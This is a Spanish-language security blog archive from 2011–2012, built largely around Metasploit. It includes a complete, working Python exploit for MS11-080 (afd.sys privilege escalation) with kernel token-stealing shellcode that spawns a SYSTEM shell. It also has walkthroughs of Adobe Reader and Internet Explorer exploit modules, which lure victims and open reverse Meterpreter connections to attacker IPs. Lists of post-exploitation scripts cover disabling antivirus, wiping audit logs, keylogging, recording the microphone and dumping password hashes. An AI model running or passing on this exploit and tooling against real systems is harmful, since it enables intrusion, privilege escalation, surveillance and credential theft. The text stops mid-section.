The zerial killer Gnu/Linux

Instalar Metasploit en IOS 5

2012-01-27T12:13:00.002-06:00

Instalacion de Metasploit en IOS 5
Installing Metasploit in iPad 2 IOS 5.0.1
Instalando Metasploit en iPad 2 IOS 5.0.1

http://www.youtube.com/watch?v=lb5WRu3EjQI&feature=youtu.be

Securitytube Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)

2012-01-11T10:57:00.000-06:00

Part 10 from Vivek Ramachandran on Vimeo.

Securitytube Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)

2012-01-11T10:56:00.001-06:00

Part 11 from Vivek Ramachandran on Vimeo.

WhatsApp al descubierto

2012-01-05T11:29:00.001-06:00

Hoy vamos a hablar de una herramienta para sniffear todo lo que whatsapp manda/recibe en la red creada a partir del estudio realizado Alberto Ortega en su post 'WhatsApp y su seguridad, ¿pwn3d?'

¿Qué es Whatsapp?

Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos.

¿Como funciona whatsapp?

Como los chicos de securitybydefault nos comentaban en el otro post, whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano.

Whatsapp usa el protocolo XMPP(una tecnología de comunicación en tiempo real muy potente y utilizada actualmente). Un claro ejemplo del uso de XMPP lo podemos encontrar en el tuenti chat sin ir muy lejos.
Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.

¿Un momento, seguro que van en texto plano?... Así cualquier desalmado puede leer mis mensajes cuando estoy en una red wifi..

Exacto, todos los datos son enviados bajo texto plano, una vulnerabilidad que fue descubierta hace meses y reportada pero a la que whatsapp no hizo caso.

Para leer el resto de la entrada visita el siguiente enlace.

http://www.securitybydefault.com/2012/01/whatsapp-al-descubierto.html

Las amenazas que protagonizarán 2012

2011-12-20T08:31:00.001-06:00

Se mantendrá la tendencia y el malware crecerá de forma dramática el nuevo año. El lucro fácil, el ciberespionaje y el hacktivismo, principales “argumentos" de los ciberdelincuentes.

Malware para tablets y smartphones, ataques “a medida" contra objetivos específicos, phising y troyanos bancarios constituyen las principales amenazas de la seguridad en 2012. La Eurocopa de Polonia y Ucrania, los Juegos Olímpicos de Londres y las elecciones presidenciales en Estados Unidos serán algunos de los hitos que los estafadores online intentarán utilizar para embaucar a sus víctimas. Por supuesto, sin olvidar el papel que pueden jugarán las redes sociales como difusoras de malware. Además el malware podría dar el salto a televisores y consolas con conexión a Internet

Smartphones y tablets
Los dispositivos con S.O. Android dominan el mercado de los smartphones y parece que cuentan con el beneplácito de la gran mayoría de los consumidores. Sin embargo, esta aceptación masiva por parte del usuario también está marcando el camino a seguir a los autores del malware. Durante 2012 se intensificarán los ataques contra esta plataforma con el objetivo de asegurar la mayor difusión posible a sus códigos maliciosos.

Las aplicaciones (las populares “apps") constituyen la mejor forma de expandir el código malicioso, descargadas tanto del mercado oficial de Google como de otros mercados alternativos. Para infectar el terminal sólo se necesita que la víctima la descargue e instale en su terminal. Una vez dado este paso, el malware puede dañar el dispositivo de muchas formas: robar los datos personales almacenados y enviarlos a dispositivos remotos, interceptar conversaciones o suscribirlos a costosos servicios de mensajería Premium, por ejemplo.

Ahora las aplicaciones maliciosas se instalan a través de los propios usuarios, después de que estos hayan sido engañados o convencidos mediante técnicas de ingeniería social. Sin embargo, los dispositivos móviles ofrecen muchas posibilidades técnicas y es solo cuestión de tiempo que nos enfrentemos a ataques automatizados donde las infecciones no dependan activamente del usuario. Desafortunadamente y teniendo en cuenta el ritmo de evolución del malware en esta plataforma, es fácil que en 2012 asistamos a estos primeros ataques automatizados, probablemente inspirados en los ataques drive-by que afectan a los ordenadores personales y que provocan la infección sin la participación de la víctima, después de visitar cualquier web adulterada.

La velocidad a la que se desarrolla el nuevo malware contrasta con las pocas actualizaciones disponibles para Android. Ya se ha mencionado en numerosas ocasiones que Android podría convertirse en el nuevo Microsoft, en cuanto a diana de las nuevas amenazas, y parece que lleva camino de conseguirlo.

Ataques dirigidos: Stuxnet y DuQu como precedentes
El capítulo de los ataques dirigidos tendría que incluir a aquellos que utilizan los mencionados teléfonos inteligentes en un contexto profesional, pues resultan especialmente atractivos para los ciberdelincuentes en busca de información apetitosa y datos y aquí los tienen en cantidad y calidad.

En cualquier caso, en 2011 vio la luz un particular spyware que causó un gran revuelo por estar específicamente diseñado para atacar a las empresas: DuQu. A pesar de que para muchos ha sido considerado como el sucesor de Stuxnet, esta herramienta de espionaje no está diseñada para el sabotaje tal cual lo entendemos. Sin embargo, DuQu es capaz de espiar a cualquier empresa, por lo que funciona más como un ladrón de datos que como una herramienta cuyo fin sea destruir un objetivo concreto. Su propósito sería recopilar tanta información como fuera posible para un posterior ataque como el protagonizado por Stuxnet.

Sin embargo, resulta alarmante comprobar que hay indicios en su código fuente que sugieren que pudo ser escrito por los creadores de Stuxnet. Las motivaciones políticas y las reivindicaciones de cualquier tipo (y ya no sólo el interés lucrativo) han entrado en escena cuando hablamos de ciberseguridad. Y el hecho de que los atacantes puedan conseguir el control de infraestructuras críticas ha dejado de ser una ficción como quedó de manifiesto con el ataque de Stuxnet en la planta nuclear iraní de Buschehr.

Los hitos del nuevo año
2012 se inicia con importantes eventos en el horizonte (entre otros, la Eurocopa de Fútbol en Polonia y Ucrania, los Juegos Olímpicos de Londres o las elecciones presidenciales en Estados Unidos) y estos sin duda darán contenido a muchos de los intentos de estafa que se producirán el próximo año:

Las amenazas digitales a las que se enfrentan los eventos deportivos mencionados podrán incluir:

-Oleadas de spam y manipulación de motores de búsqueda online para la venta de entradas y todo tipo de elementos falsificados relacionados con los eventos señalados

-Diseño de páginas falsas de venta online de entradas a los diferentes eventos deportivos

-Ataques contra los sitios oficiales de los Juegos Olímpicos y/o Eurocopa como potenciales formas de protesta

-Ataques contra las redes inalámbricas WLAN diseñadas para los visitantes que acudan a estos eventos

La lista de ataques potenciales puede ser más larga pues no hay que olvidar los ataques contra infraestructura, bien como intento de sabotaje o como elemento de chantaje.

En el caso de las elecciones presidenciales de los Estados Unidos los atacantes pueden recurrir a la ingeniería social con promesas de videos escandalosos o fotografías que afecten a los candidatos para conducir a los internautas a sitios web infectados con código malicioso. Se trata de trucos tan habituales como puedan ser las oleadas de spam cuyo contenido tenga alguna conexión con el asunto electoral y sirva para conducir a sus víctimas potenciales a todo tipo de páginas capaces de provocar una infección en el PC de sus víctimas.

Phishing y troyanos bancarios
Si hablamos de phishing, los usuarios podrían tener que enfrentarse con oleadas de ataques altamente sofisticados y a menudo con un target específico. No podemos olvidar el ataque sufrido por la red de Sony PlayStation en el que se comprometieron los datos de cerca de 77 millones de clientes. La información robada entonces podría ser usada ahora en correos electrónicos que tuvieran como fin estafar a sus destinatarios.

Aunque hemos visto que no solo existen motivaciones económicas, el dinero fácil seguirá siendo el principal argumento de las actividades ilícitas delos ciberdelincuentes y una de las formas más populares de conseguirlo durante este 2011 fueron los troyanos bancarios. Todo indica que en 2012 nada hará cambiar esta tendencia, si no, más bien todo lo contrario si atendemos al número creciente de usuarios de banca online (en España, el 46,5% de los internautas#). Los troyanos bancarios constituyen pues una amenaza que debe ser tomada muy en serio, especialmente por los usuarios particulares, ya que un ataque exitoso a menudo supone una pérdida financiera significativa para la víctima.

SmartTVs y consolas
Al margen de ordenadores y smartphones, que constituyen las grandes plataformas de conexión a Internet, otros equipos empiezan a conectarse ya de forma habitual desde el salón de cualquier hogar. Nos referimos a televisores y consolas que en principio estaban fuera del campo de acción de los cibercliminales pero que a medida que se convierten en dispositivos conectados pueden empezar a estar en peligro, sobre todo si tenemos en cuenta que por regla general están desprotegidos y carecen de actualizaciones frecuentes.

“2012 estará protagonizado por ataques dirigidos contra todo tipo de organizaciones, con independencia de su tamaño. Las empresas pequeñas a menudo no están conveniente protegidas lo que las convierte en objetivos más sencillos y vulnerables. Los grandes eventos como los juegos Olímpicos o las elecciones presidenciales darán contenido a muchas de la amenazas. Los smartphones con sistema operativo Android se convertirán en centro de muchos ataques a medida. Y si en 2011 el número de amenazas creció de forma dramática, la tendencia se mantendrá en 2012. El malware se consolidará como la mejor arma de los cibercriminales para conseguir dinero, pero también como herramienta de ciberespionaje y hacktivismo"

Fuente: G Data Software AG
Ilustración: G Data

MS11-080 Afd.sys Privilege Escalation

2011-11-30T10:12:00.000-06:00

################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################

from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser

usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()

kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi

def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None

print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"

WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int

class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]

## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise

baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)

################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"

restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"

shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")

############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"

Security By Default: Buscando el país de origen de un malware

2011-11-18T11:59:00.000-06:00

Security By Default: Buscando el país de origen de un malware: "Cuando aparece un nuevo malware muchas veces leemos en documentos técnicos de compañías antivirus en qué país se ha creado, pero ¿cómo lo saben?, con esta entrada pretendo explicar de dónde sale esta información. Para entender el ejercicio, se va a utilizar una muestra del malware Noppuca.
"

'via Blog this'

25 Años de virus

2011-11-17T09:05:00.017-06:00

Excelente video =) lo recomiendo totalmente.

http://www.ted.com/talks/view/lang/es//id/1192

Security By Default: Tu WordPress intocable con Mutex

2011-11-16T10:52:00.001-06:00

Security By Default: Tu WordPress intocable con Mutex: "La cantidad de ataques y exploits que se publican para WordPress es bastante considerable, hace poco hubo un 'deface masivo' de blogs que afectó a más de 2.500 sitios que tenían como denominador común WordPress + Plugin defectuoso.

Por aquí ya hablamos sobre 'PhpIds', un proyecto que tiene como misión desarrollar una librería para bloquear amenazas en proyectos escritos en PHP, de forma que permita fácilmente a un desarrollador añadir una capa de defensa en sus aplicaciones web.

PhpIds bloquea ataques de tipo XSS, SQLI o RFI

También existe un proyecto similar para Perl"

'via Blog this'

Security By Default: Fortificación de nginx

2011-11-16T10:52:00.000-06:00

Security By Default: Fortificación de nginx: "nginx es un popular servidor web y proxy inverso libre y gratuito que ya aloja más de 43 millones de dominios, entre los que se encuentra Wordpress, Dropbox, Facebook o TechCrunch.

En esta entrada vamos a ver algunos aspectos a configurar para que su instalación sea más segura.
"

'via Blog this'

Meterpreter Scripts

2011-11-15T13:08:00.004-06:00

Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus.

En este artículo se describen algunos scripts que pueden ser utilizados a traves de este shellcode:

1. Identificar si el sistema víctima se encuentra en una maquina virtual.
2. Consultar la configuración de seguridad.
3. Habilitar el escritorio remoto en la maquina víctima.
4. Habilitar el servicio de Telnet.
5. Deshabilitar el Antivirus
6. Consultar la máscara de red
7. Modificar el archivo de HOSTS
8. Enumerar la información del sistema a través de wmic
9. Consultar información detallada de la maquina atacada, puede también capturar tokens, hashes, etc.
10. Consultar y capturar todo el registro Windows

CHECKVM

Permite identificar si el sistema víctima se encuentra en una maquina virtual.

GETCOUNTERMEASURE

Permite consultar la configuración de seguridad existente en la maquina víctima y puede deshabilitar otras características como Antivirus, Firewall, etc.

GETGUI

Permite habilitar el escritorio remoto en la maquina víctima, crea un usuario/password para hacer uso de la conexión.

GETTELNET

Permite habilitar el servicio de Telnet.

KILLAV

Permite Deshabilitar el Antivirus y otros sistemas de seguridad.

GET_LOCAL_SUBNETS

Permite consultar la máscara de red, esto puede llegar a ser útil para el proceso de Pivoting.

HOSTSEDIT

Permite modificar el archivo de HOSTS.

REMOTEWINENUM

Permite enumerar la información del sistema a través de wmic.

WINENUM

Permite consultar información detallada de la maquina atacada, puede también capturar tokens, hashes, etc.

SCRAPER

Permite consultar y capturar todo el registro Windows de la maquina.

**Scripts proporcionados por darkoperator

BROWSERENUM-DEV

Permite consultar toda la información almacenada en el browser: Firefox, internet Explorer y Chrome.

Para este caso el script fallo en su ejecución, al momento en que uds lo ejecuten se darán cuenta que es un error en los paths (falta editar dichos path en el archivo Ruby .rb).

download

DISABLE_AUDIT

Permite deshabilitar los eventos de auditoría a través de la modificación de las políticas locales de seguridad en la maquina víctima. Después de eliminar los registros el script habilita de nuevo el servicio de auditoria tal y como estaba antes de la modificación.

sownload

KEYLOGRECORDER

Permite almacenar todos los eventos de tecleados por el usuario en la maquina victima en una base de datos sqlite, este script ya hace parte del framework de Metasploit.

download

SOUNDRECORDER

Permite grabar y almacenar todo lo que se escucha a través del micrófono por una cantidad determinada de tiempo.

download

WINBF

Permite realizar un ataque de fuerza bruta al login de Windows a través de un escritorio remoto.

download

http://www.nyxbone.com/metasploit/MeterpreterScripts.html

Meterpreter Commands

2011-11-15T12:38:00.005-06:00

Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus.

En este artículo se describen algunas de las características más importantes de este shellcode como son:

1. Eliminación de archivos de Log.
2. Captura de pantalla.
3. Carga y descarga de archivos.
4. Copiar información.
5. Extracción de información de configuración: Tablas de enrutamiento, tarjetas de red, registro de Windows, configuración de seguridad, archivos compartidos, configuración de firewall, etc, etc.

Core Commands

BACKGROUND

Ejecuta la sesión actual en segundo plano para retornar a la línea de comandos de Meterpreter, para regresar a la sesión se ejecuta el comando tradicional (sessions –i 1).

MIGRATE

Permite migrarse a otro proceso en la maquina víctima.

File Systems Commands

LS

Permite visualizar los archivos en el directorio remoto actual.

DOWNLOAD

Permite descargar un archivo de la maquina atacada, es necesario hacer uso del back-slash doble en la ruta del mismo.

UPLOAD

Permite cargar un archivo en una ruta especifica, de la misma manera que el comando download es necesario hacer uso del doble slash al momento de indicar la ruta.

SEARCH

Permite buscar archivos en la maquina víctima, además:

1. Permite indicar el tipo de archivo.

2. Permite indicar la ruta donde se quiere realizar la búsqueda.

Networking Commads

IPCONFIG

Permite visualizar todas la información de todas tarjetas de red existentes en la maquina atacada

ROUTE

Permite consultar y modificar la tabla de enrutamiento.

System Commads

EXECUTE

Permite ejecutar un comando.

GETPRIVS

Permite obtener tantos privilegios de administración como sea posible.

GETUID

Permite consultar el tipo de usuario que la maquina victima esta ejecutando.

PS

Permite consultar todos los procesos que están en ejecución.

SHELL

Permite obtener un Shell, o línea de comando.

SYSINFO

Permite obtener información del sistema remoto como:

1. Nombre de la maquina.

2. Sistema Operativo.

3. Tipo de arquitectura.

4. Lenguaje del sistema operativo.

User Interface Commads

ENUMDESKTOPS

Permite consultar todas las sesiones (o escritorios).

IDLETIME

Permite consultar el tiempo en el que el usuario de la maquina victima ha estado ausente.

SCREENSHOT

Permite extraer una imagen del escritorio remoto.

UICTL

Permite controlar algunos de los componentes del sistema afectado.

Password Database Commads

HASHDUMP

Permite consultar el contenido del la base de datos SAM en sistemas Windows.

http://www.nyxbone.com/metasploit/Meterpreter.html

Adobe Collab.getIcon() Buffer Overflow

2011-11-14T17:50:00.006-06:00

Este modulo explota una vulnerabilidad del tipo buffer overflow en Adobe Reader y Adobe Acrobat. Entre las versiones afectadas se incluyen < 7.1.1, < 8.1.3 y < 9.1.

Creando un archivo pdf especial que contenga un llamado malformado a la función Collab.getIcon() podría permitir al atacante la ejecución de código arbitrario.

Target: 0 - Adobe Reader Universal (JS Heap Spray) (default)

Desarrollado por:
* MC < mc [at] metasploit.com >
* Didier Stevens < didier.stevens [at] gmail.com >
* jduck < jduck [at] metasploit.com >

Se definen las características del exploit con una conexión reversa tcp a la maquina atacante con dirección IP: 192.168.100.228

Se ejecuta el exploit de manera que este queda a la espera en el puerto 8080, para que este se ejecute en la maquina víctima se debe incitar a la persona atacada ya sea por medio de ingeniería social, email, etc. a que consulte la siguiente dirección

http://192.168.100.228:8080/cnoqwJeKZyTO

Cabe mencionar que la parte “cnoqwJeKZyTO” de la URL es totalmente configurable y se puede modificar desde las opciones del exploit.

El siguiente es simplemente esperar para que el servidor Web del atacante sea visitado con la versión vulnerable y de esta forma se obtiene la sesión meterpreter.

http://www.nyxbone.com/metasploit/adobe_geticon.html

Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow

2011-11-14T12:01:00.007-06:00

Este modulo explota una vulnerabilidad en el gestor de tablas Smart INdependent Glyplets (SING) que se encuentra en las versiones 8.2.4 y 9.3.4 de Adobe Reader. Se asume que las versiones anteriores también son vulnerables.

Target: 0 - Automatic (default)

Desarrollado por:
* Unknown < >
* < [at] sn0wfl0w >
* < [at] vicheck >
* jduck < jduck [at] metasploit.com >

Se definen las opciones necesarias para la ejecución del exploit, la idea es crear un archivo pdf (que para este caso se llamo manual.pdf) el cual tendrá el Payload meterpreter:reverce_tcp que nos permitirá realizar la conexión con el atacante con dirección IP: 192.168.2.115 a través del puerto 4444.

Al ejecutar el exploit se crea el archivo pdf

Para permitir la conexión reversa proveniente desde la victima hacemos uso del exploit multi/handler el cual escucha todas las peticiones que lleguen al puerto 4444 de la maquina atacante.

Como se puede observar se establece una conexión con la maquina victima de dirección IP: 192.168.2.X y se obtiene una sesión meterpreter.

VIDEO: AQUI

wallpaper

2011-11-14T09:05:00.002-06:00

Internet Explorer Winhlp32.exe MsgBox Code Execution

2011-11-07T12:12:00.006-06:00

Este modulo explota una vulnerabilidad que permite ejecutar código arbitrario cuando el usuario presiona la tecla F1 en un MessageBox creado a través de un VBscript en una página Web. Cuando el usuario presiona la tecla F1 se despliega automáticamente el MessageBox de ayuda el cual cargará y usará el archivo HLP desde un servidor SMB o WebDAV. Esta versión en particular del exploit implementa un servidor WebDAV el cual enviara el archivo HLP y el PAYLOAD a la maquina atacada.

Durante las pruebas se detectaron mensajes generados por el Payload los cuales pueden prevenir al usuario víctima del ataque, los desarrolladores de este exploit esperan obtener una versión del mismo que no genere estos mensajes de alerta.

Target:
0 - Automatic (default)
1 - Internet Explorer on Windows

Desarrollado por:
Maurycy Prodeus
jduck "jduck [at] metasploit.com"

Se ejecuta el exploit y se espera por la victima:

En la maquina atacada se obtiene un MessageBox alentando al usuario a presionar la tecla F1:

Después de que el usuario da clic sobre el botón Aceptar y presiona la tecla F1 se obtiene una sesión meterpreter:

Los mensajes de alerta que se muestran en la maquina víctima durante este proceso son:

Al dar clic en la opción “Ejecutar” se obtiene:

La sesión de meterpreter obtenida tiene permisos de usuario limitados, por tal razón se usa la función GETSYSTEM la cual nos permite aumentar el nivel de privilegios en la maquina atacada para poder ejecutar comandos más avanzados.

En este caso getsystem (el cual implementa las técnicas disponibles de manera automática) usa la técnica 1: Service – Named Pipe Impersonation (In Memory/Admin).

POC.
Video: AQUI

http://www.youtube.com/watch?v=DlepoeBBxbE

Internet Explorer DHTML Behaviors Use After Free

2011-11-07T11:55:00.002-06:00

Este modulo explota una vulnerabilidad del tipo use-after-free que está incluida en el componente DHTML de Internet Explorer en las versiones 6 y 7. Este tipo de error es usado muy frecuentemente y se conoce como la vulnerabilidad “iepeers”. El nombre se da debido a la solución que planteo Microsoft de bloquear el acceso al archivo iepeers.dll.

Targets:
* 0 - (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista (default)
* 1 - IE 6 SP0-SP2 (onclick)
* 2 - IE 7.0 (marquee)

Desarrollado por:
* unknown < >
* Trancer < mtrancer [at] gmail.com >
* Nanika < >
* jduck < jduck [at] metasploit.com >

Se definen las opciones disponibles por el exploit:

1. Dirección IP atacante: 192.168.100.228
2. Dirección IP víctima: 192.168.100.232
3. URL: http://192.168.100.228:8080/hola.html
4. Payload: Windows/meterpreter/reverce_tcp
5. Puerto de conexión con la maquina atacante: 4444

msf > search DHTML

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good Internet Explorer DHTML Behaviors Use After Free

msf >

---> http://www.nyxbone.com/metasploit/ms10_018_ie_behaviors.html

Illustrating the Process of a Network Attack with Armitage

2011-11-07T11:49:00.001-06:00

Comparto excelente video.

Illustrating the Process of a Network Attack with Armitage from Surapheal Belay on Vimeo.

SMB Scanners Metasploit

2011-11-01T09:01:00.008-06:00

Metasploit cuenta con varios modulos para la consultar y auditar la seguridad del protocolo SMB.

Podemos hacer un msf > search y posteriormente el nombre de cada uno de ellos para mas informacion msf > info

» smb/pipe_auditor
» smb/pipe_dcerpc_auditor
» smb/smb2
» smb/smb_enumshares
» smb/smb_enumusers
» smb/smb_login
» smb/smb_lookupsid
» smb/smb_version

PIPE AUDITOR

El modulo pipe_auditor puede ser utilizado para determinar qué servicios están disponibles sobre SMB

PIPE DCERPC AUDITOR

Este escáner retornara los servicios DCERPC a los cuales se puede tener acceso a través de un canal SMB.

SMB2

Permite determinar si los diferentes hosts de la red soportan el protocolo SMB2.

SMB ENUM SHARES

Este modulo permite consultar los diferentes archivos y carpetas compartidas en los sistemas de la red. Como se puede observar todos las consultas son bloqueadas en todos los sistemas, una ventaja de este modulo es que permite ingresar las credenciales de usuario / contraseña de manera que esta combinación pueda ser probada en todos los sistemas de la red.

ENUM USERS

El escáner smb_enumusers se conectara con cada sistema a través del servicio SMB RPC y listará todos los usuarios existentes.

SMB LOGIN

